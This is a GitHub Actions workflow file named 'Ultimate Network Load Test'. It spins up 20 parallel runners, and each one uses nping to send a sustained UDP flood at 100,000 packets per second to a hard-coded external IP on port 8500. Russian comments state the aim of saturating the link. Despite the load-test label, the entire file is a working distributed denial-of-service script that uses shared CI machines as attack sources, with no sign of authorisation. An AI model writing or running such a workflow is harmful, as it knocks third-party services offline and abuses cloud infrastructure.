name: Ultimate Network Load Test

on:
  workflow_dispatch:

jobs:
  heavy-load:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        machine: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]

    steps:
      - name: Install Nmap/Nping
        run: sudo apt-get update && sudo apt-get install -y nmap

      - name: Extreme UDP Load
        run: |
          echo "Запуск максимальной нагрузки с машины №${{ matrix.machine }}"
          
          # TARGET: 212.22.85.148
          # PORT: 8500
          
          # Параметры nping:
          # --udp: использовать протокол UDP
          # --rate 100000: Пытаться слать 100 000 пакетов в секунду (это очень много)
          # -c 100000000: Общее количество пакетов (огромное, чтобы не кончилось)
          # --data-length 1400: Максимальный размер данных в пакете (чтобы забить канал в Gbps)
          
          sudo nping --udp -p 8500 --rate 100000 -c 100000000 --data-length 1400 212.22.85.148
